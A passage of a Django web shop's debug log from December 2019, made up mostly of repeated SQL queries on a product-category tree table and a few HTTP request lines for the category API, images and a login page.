"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:17:08,314 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:17:08,317 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:17:08,321 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:17:08,325 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:17:08,331 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:17:08,335 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:17:08,339 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:17:08,343 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:17:08,347 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:17:08,353 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:17:08,357 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:17:08,361 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:17:08,365 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:17:08,369 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:17:08,373 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:17:08,379 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:17:08,383 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:17:08,387 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:17:08,393 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:17:08,397 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:17:08,403 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:17:08,407 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:17:08,411 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:17:08,415 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:17:08,419 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:17:08,426 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:17:08,430 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:17:08,434 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:17:08,438 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:17:08,441 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:17:08,445 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:17:08,450 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:17:08,454 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:17:08,458 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:17:08,464 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:17:08,468 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:17:08] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:17:09] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [27/Dec/2019 07:17:09] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:17:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 07:17:56,868 utils 4252 140031732287232 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5jrxkjv2b89t10o1e2udcoers9nepp9h' LIMIT 1; args=('5jrxkjv2b89t10o1e2udcoers9nepp9h',) DEBUG 2019-12-27 07:17:56,870 utils 4252 140031732287232 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5jrxkjv2b89t10o1e2udcoers9nepp9h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T07:17:56.868755+00:00'::timestamptz); args=('5jrxkjv2b89t10o1e2udcoers9nepp9h', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 7, 17, 56, 868755, tzinfo=)) [27/Dec/2019 07:17:56] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-12-27 07:19:27,305 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:19:27,316 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:19:27,322 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:19:27,326 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:19:27,333 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:19:27,337 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:19:27,341 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:19:27,346 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:19:27,350 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:19:27,356 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:19:27,360 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:19:27,364 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:19:27,368 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:19:27,372 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:19:27,378 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:19:27,382 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:19:27,389 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:19:27,393 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:19:27,397 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:19:27,404 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:19:27,408 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:19:27,412 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:19:27,416 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:19:27,420 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:19:27,424 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:19:27,430 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:19:27,434 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:19:27,438 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, 